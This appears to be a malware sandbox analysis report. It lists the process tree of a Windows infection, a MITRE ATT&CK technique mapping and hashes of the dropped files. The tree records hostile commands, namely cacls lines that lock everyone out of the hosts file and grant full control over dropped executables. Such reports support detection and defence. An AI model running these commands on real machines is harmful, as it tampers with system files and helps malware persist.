C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵PID:2836
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:5620
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:5452
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:5160
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:5272
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:5300
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:5288
-
-
-
C:\Windows\SysWOW64\zebhau.exeC:\Windows\SysWOW64\zebhau.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2700
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\jbltict.exe1⤵PID:4428
-
C:\Windows\ime\jbltict.exeC:\Windows\ime\jbltict.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:220
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\fbmdkvil\jbltict.exe /p everyone:F1⤵PID:3676
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:2980
-
-
C:\Windows\system32\cacls.execacls C:\Windows\fbmdkvil\jbltict.exe /p everyone:F2⤵PID:4000
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\iitktzuiz\etbisp.exe /p everyone:F1⤵PID:4332
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:1624
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\iitktzuiz\etbisp.exe /p everyone:F2⤵PID:4556
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\jbltict.exe1⤵PID:3452
-
C:\Windows\ime\jbltict.exeC:\Windows\ime\jbltict.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:208
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\fbmdkvil\jbltict.exe /p everyone:F1⤵PID:4324
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:3252
-
-
C:\Windows\system32\cacls.execacls C:\Windows\fbmdkvil\jbltict.exe /p everyone:F2⤵PID:5448
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\iitktzuiz\etbisp.exe /p everyone:F1⤵PID:4692
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:3624
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\iitktzuiz\etbisp.exe /p everyone:F2⤵PID:4104
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Defense Evasion
Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD586316be34481c1ed5b792169312673fd
SHA16ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA25649656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA5123a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize
275KB
MD54633b298d57014627831ccac89a2c50b
SHA1e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA51229590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize
26.2MB
MD585e19e3192f12a2a4181417b69bb2f3c
SHA1bd79c4558d3a703c53cb489b39bde026459497bc
SHA2560660e4f13c7bd77c087e98931705e68feaadacf47216bb3a06222925374ba76f
SHA512b42033efa74af38698c71f27fead8dd84a5b619c92be7c5f0fd110ef5ef0c07c4ab745910e74301d902c4d77c58d282537d4ae75f3ae5b1fb225303ab2f56c38
-
Filesize
4.1MB
MD5f338b42c26f0642b72ebcde434a3b894
SHA174792362191a51234286b3b5c9cfc09d77b8d62d
SHA256af7f6867d5804307053d696d0a72fdcee9bb2609ae61eb8115b0e0b80b815572
SHA512fc592167c3865f5a5641c4167f99b6790d32a37e9d593c8ea255cb8760ce063425fdc04f4fb66c74670e137e1a3eced9b9379d5417ad1b0caa57ae87b2e5b4c5
-
Filesize
8.6MB
MD5c9383ae52347082312db2efbd9ea50ab
SHA19526eefb102caafc65ee28501787932a1143b636
SHA2569c36769a7599ba7bd7188bab009a4d6a0b7084a69c7ece55c91e26f3546c956a
SHA512b8703a22c31c99f9f4e871b20cbbceb2a4abb508f53d48c1a46ce818d0528d96a07b3096bdb073e842e8125cb7ca8520a025da2de22f1f8604c4c7b61a44c7ae
-
Filesize
1.2MB
MD54659d26b8207bddb24e61858a18b4dca
SHA1c34a444c6f348aa941340cda5548ad109fce3606
SHA25688333e8fb16025c20d8871c0a76a2023a121b3f3af420aae26ea4dd4c6dcb28a
SHA51240389fef4b0f51376091381af2a6d3ef1c93826e4574861f2eca251cd9760eee38d4eb6d34ff929d36d8528957a55c0d33b8b4a181f81ce1dfa6166c9c1cc9a0
-
Filesize
3.8MB
MD56290d4be72b708050a7485bce19f4fca
SHA16ebb95e4cb020a75540d7bb3e85b1fb565ee6032
SHA25624983b5293f9f84f00c010ea0ee43372133d705008a7f1d1d4c472e7b2213a14
SHA51213fb23809449473239f6439644cee69ed8d2e84ca55ebb91f7cdcc7f9a68e4f6ccae48b437fa5b5ea598bcf63ccb69cea1c95fb98eda4ed9c5a1c91e3e78269f
-
Filesize
45.2MB
MD57cad5366243645732ebafd119687a1eb
SHA196f4483aca62a8241bed32df9d2f4b482c7651ff
SHA256130ba6cb72b51307adcd167b1002fd83c28738f3768450abc2586214aebcbaac
SHA51265bb4c68fb4827838d53f60cceb174d69e735d86c8ff48efbdffda94deafcdbbef2b3cbdb2b83a71e3f09f3e1e797a7d0350f34a8a9ce97dc4ffcedaec1236a3
-
Filesize
3.0MB
MD59add10be36b165a390286eb783feaddc
SHA1ba1c2596ae6dab2eb55bbf60c0b2ca987e3d60b6
SHA256bbd894c14d225936492155230cf83b96018c0328c6a5f1c94404382731fcb943
SHA51297396314afd20c7d10f8c1b4165e01e96585196778cc2c31ca4c357178428abb9129c06012dc39f1234d5f11935c797bca0c1c9c50e114f9e180435f549b04b8
-
Filesize
7.6MB
MD53cc936e8985cb9d83940f3fec2c0f022
SHA1c5e3dc981cef99513a0669283a27dab54f1995af
SHA256701420cfcaf8b48e050278506f46612b18940de0a69fc48691d319765ff1a888
SHA5129afd77b45ca49fbcb9ecc8b2c00759bd979cb2fbe25d6731bf86e297e91e787aa43c0ed26c35f2bef5659d920da862ec85bd2bc05b6f703ba0f3ddf397f781cf
-
Filesize
826KB
MD53346e1f8e79ad693ba7aa2a565dd5b11
SHA19b5cb84708ee44d739f8406b1f0a15c6ce58677c
SHA256c640dec2bf4c15c6b601b73257a80daa37faea22543d9b63e5a58c48ff01c4b5
SHA512c18f123b1febc6bbd88727e7877ec0a504986d1d316d423342dd32d07219c45c6d41566f8de5465558ce42d90ef6bf01afbb498dc23c9d07925d0200ab66ee4e
-
Filesize
33.3MB
MD58303e4b9266d01df86d1b6bfc99f30c4
SHA1acbd924f4b9f034359e260085eb05bc9f6eca20b
SHA2560ad6dd56a0363da2c869003ae49359c1e077ec9d2298df50ab1fc0bb36d6349f
SHA5124517e3752a768e7c1dcba30e7f4975fa93b455467984283e7862ad839a951dbc29374fc718075fd0629ef0d001a20cc461bf27ca2b03c0bf58bc4067b665716f
-
Filesize
2.3MB
MD5dc8bd6f0d3bd49f9e3caaa68cbedab49
SHA116f0712b120135eb899a01342d3e08f60d023e87
SHA256486eae2aa5e90e85888f6a4b5e5766a86e907be6d1fa23f4927bd90fa431e9b3
SHA5129ac9be67c3489edc6b90f829150f05e0fe61e4f90351333f6394c1880e90542d680583d558211cb8e2d0dc0d37768570e2d8f2c6a72912b05d7dda8ba84add0d
-
Filesize
20.7MB
MD591806f48b7651fd4146cab969a019bfe
SHA1cd8bf60dedc0c5f62fab759b06a12c8c667307bf
SHA256177e793ead1d05fc67d942b7ad519ed37c92d14848aa278ece64ee9178920435
SHA512c8af8d917e9b04445b18e15ead6fc88af0a3c905276287974aca388e3887419bc8653b8e07360290bc93857055bb595b6ebfd9b9a7c45cf246066d1b5ccf7136
-
Filesize
8.5MB
MD5c6630bed01a4084289a151d4b271a2fa
SHA18b436108ad63aa64daeea0563930bc0cc86b9325
SHA2569c090280aa73aaa33819c6b89b11d5cfe48a04036b2ee07b13b554feb2ea3905
SHA51256e2c5c7d6c1eb44439c8157d17755cc8e91b909c02542c555dbf38f5dd2172f47ac003cc9a72657c6d2e5137c9856683951c5d13933d49e0b241f46dd8fe177
-
Filesize
1019KB
MD56d0c59463ceab86270bdbdd794b905fb
SHA13b5833ba9b28d361e3f43a8f97116ebe8a813479
SHA2566163fc2274c062d0715e3b06633de2b0bd5f1e00e6b289ea88272d01cbfe41b4
SHA512f617253fb8b2007befe91d1fbc76f490490bd22bbfd02ddd35b6c5e0225268db42aad3c80e8f314c70cdab6833c3895db1e7b58b6a59a90f7fa4edfbc2dc9749
-
Filesize
693B
MD5f2d396833af4aea7b9afde89593ca56e
SHA108d8f699040d3ca94e9d46fc400e3feb4a18b96b
SHA256d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34
SHA5122f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01
-
Filesize
126KB
MD5e8d45731654929413d79b3818d6a5011
SHA123579d9ca707d9e00eb62fa501e0a8016db63c7e
SHA256a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af
SHA512df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6
-
Filesize
343KB
MD52b4ac7b362261cb3f6f9583751708064
SHA1b93693b19ebc99da8a007fed1a45c01c5071fb7f
SHA256a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23
SHA512c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616
-
Filesize
11KB
MD52ae993a2ffec0c137eb51c8832691bcb
SHA198e0b37b7c14890f8a599f35678af5e9435906e1
SHA256681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59
SHA5122501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9
-
Filesize
6KB
MD5b648c78981c02c434d6a04d4422a6198
SHA174d99eed1eae76c7f43454c01cdb7030e5772fc2
SHA2563e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9
SHA512219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2
-
Filesize
72KB
MD5cbefa7108d0cf4186cdf3a82d6db80cd
SHA173aeaf73ddd694f99ccbcff13bd788bb77f223db
SHA2567c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9
SHA512b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1
-
Filesize
381KB
MD5fd5efccde59e94eec8bb2735aa577b2b
SHA151aaa248dc819d37f8b8e3213c5bdafc321a8412
SHA256441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45
SHA51274a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3
-
Filesize
424KB
MD5e9c001647c67e12666f27f9984778ad6
SHA151961af0a52a2cc3ff2c4149f8d7011490051977
SHA2567ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d
SHA51256f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe
-
Filesize
332KB
MD5ea774c81fe7b5d9708caa278cf3f3c68
SHA1fc09f3b838289271a0e744412f5f6f3d9cf26cee
SHA2564883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38
SHA5127cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb
-
Filesize
8.9MB
MD59e04ebf7af6ffea1aec966e2e034f6ac
SHA11502d7af4a9b266be5509a394653e2bc951f9012
SHA2569b0a1b4ca8f401e489f449a8111df85f5993c5456412f79d95f263a8e1b9023d
SHA512047d4ff37cb0eced18c8d8001658c6447483ec883b22b4a751933601eeff3c460443360fe2d013180a140539581d1e07881dcb57627680f7519917cc8149a907
-
Filesize
1KB
MD5c838e174298c403c2bbdf3cb4bdbb597
SHA170eeb7dfad9488f14351415800e67454e2b4b95b
SHA2561891edcf077aa8ed62393138f16e445ef4290a866bccdbb7e2d7529034a66e53
SHA512c53a52b74d19274c20dece44f46c5d9f37cd0ec28cf39cac8b26ba59712f789c14d1b10b7f5b0efdf7ce3211dda0107792cc42503faa82cb13ffae979d49d376